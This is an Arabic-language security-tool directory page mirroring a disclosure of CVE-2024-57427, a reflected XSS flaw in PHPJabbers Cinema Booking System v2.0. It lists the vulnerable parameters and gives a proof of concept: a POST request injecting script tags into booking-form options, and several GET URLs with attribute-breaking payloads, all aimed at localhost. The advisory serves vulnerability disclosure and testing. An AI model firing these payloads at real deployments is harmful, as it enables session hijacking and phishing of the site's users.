Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2024-57427 — CVE-2024-57427: نظام PHPJabbers Cinema Booking System الإصدار v2.0 معرّض لثغرة XSS المنعكسة، مما يتيح اختطاف الجلسات وهجمات التصيّد. | Kitploit
أدوات/GitHubGitHub/ahrixia/cve-2024-57427
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبأمن الويباختبار الاختراق
GitHubahrixia/cve-2024-57427

CVE-2024-57427

CVE-2024-57427: نظام PHPJabbers Cinema Booking System الإصدار v2.0 معرّض لثغرة XSS المنعكسة، مما يتيح اختطاف الجلسات وهجمات التصيّد.

عرض المستودع
منذ سنة واحدةلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2024-57427 - ثغرة XSS المنعكسة

PHPJabbers Cinema Booking System v2.0 عرضة لثغرة البرمجة النصية عبر المواقع المنعكسة (XSS). تتعامل نقاط نهاية متعددة مع إدخال المستخدم بشكل غير سليم، مما يسمح بتنفيذ سكربتات خبيثة في متصفح الضحية. يمكن للمهاجمين إنشاء روابط خبيثة لسرقة ملفات تعريف الارتباط الخاصة بالجلسة أو شن هجمات تصيد.

المعلمات المتأثرة:

دوال طلبات POST المتأثرة

  • OPTIONS > BOOKING FORM:
    • value-enum-o_currency
    • value-enum-o_booking_status
    • value-enum-o_payment_status
    • value-enum-o_payment_disable
    • value-enum-o_allow_paypal
    • value-enum-o_allow_authorize
    • value-enum-o_allow_cash
    • value-enum-o_allow_creditcard
    • value-enum-o_allow_bank
  • OPTIONS > BOOKING:
    • value-enum-o_bf_include_title
    • value-enum-o_bf_include_name
    • value-enum-o_bf_include_email
    • value-enum-o_bf_include_phone
    • value-enum-o_bf_include_company
    • value-enum-o_bf_include_address
    • value-enum-o_bf_include_country
    • value-enum-o_bf_include_state
    • value-enum-o_bf_include_city
    • value-enum-o_bf_include_zip
    • value-enum-o_bf_include_notes
    • value-enum-o_bf_include_captcha

دوال طلبات GET المتأثرة

  • locale
  • hide
  • theme

التأثير:

يمكن للمهاجم تنفيذ كود JavaScript عشوائي في متصفح الضحية، مما يتيح سرقة البيانات واختطاف الجلسات وهجمات التصيد. قد تؤدي هذه الثغرة إلى المساس بأمان وسلامة جلسات المستخدم وربما التطبيق نفسه.

الاستغلال - إثبات المفهوم (POC)

البرمجة النصية عبر المواقع المنعكسة (XSS)

الحمولة: <script>alert(x)</script>

طلب POST الكامل

root@kitploit:~
POST /CinemaBookingDev/index.php?controller=pjAdminOptions&action=pjActionUpdate HTTP/1.1
Host: 127.0.0.1
Accept-Encoding: gzip, deflate, br
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.6778.140 Safari/537.36
Connection: close
Cache-Control: max-age=0
Cookie: CinemaBooking=xxxxxxxxxxxxxxx
Content-Type: application/x-www-form-urlencoded
Sec-CH-UA-Platform: Windows
Sec-CH-UA-Mobile: ?0
Content-Length: 778

options_update=1&next_action=pjActionBookingForm&value-enum-o_bf_include_title=XXS1<script>alert(1)</script>&value-enum-o_bf_include_name=XXS2<script>alert(2)</script>&value-enum-o_bf_include_email=XXS3<script>alert(3)</script>&value-enum-o_bf_include_phone=XXS4<script>alert(4)</script>&value-enum-o_bf_include_company=XXS5<script>alert(5)</script>&value-enum-o_bf_include_address=XXS6<script>alert(6)</script>&value-enum-o_bf_include_country=XXS7<script>alert(7)</script>&value-enum-o_bf_include_state=XXS8<script>alert(8)</script>&value-enum-o_bf_include_city=XXS9<script>alert(9)</script>&value-enum-o_bf_include_zip=XXS10<script>alert(10)</script>&value-enum-o_bf_include_notes=XXS11<script>alert(11)</script>&value-enum-o_bf_include_captcha=XXS12<script>alert(12)</script>

طلب GET الكامل

الحمولة: "><script>alert(x)</script> و "></script><script>alert(x)</script>

root@kitploit:~
http://127.0.0.1/CinemaBookingDev/preview.php?locale=1&hide=0&theme=theme2"><script>alert(1)</script>&selected_date=21-12-2024
http://127.0.0.1/CinemaBookingDev/preview.php?locale=1&hide=XXS1"></script><script>alert(1)</script>&theme=theme2&selected_date=21-12-2024
http://127.0.0.1/CinemaBookingDev/preview.php?locale=1se"></script><script>alert(1)</script>&hide=0&theme=theme2&selected_date=21-12-2024
http://127.0.0.1/CinemaBookingDev/index.php?controller=pjAdminEvents&action=pjActionGetSeats&event_id=14&venue_id=2&date_time=15-12-2024 00:00&index=new_1492"><script>alert(1)</script>
تنزيل الأداة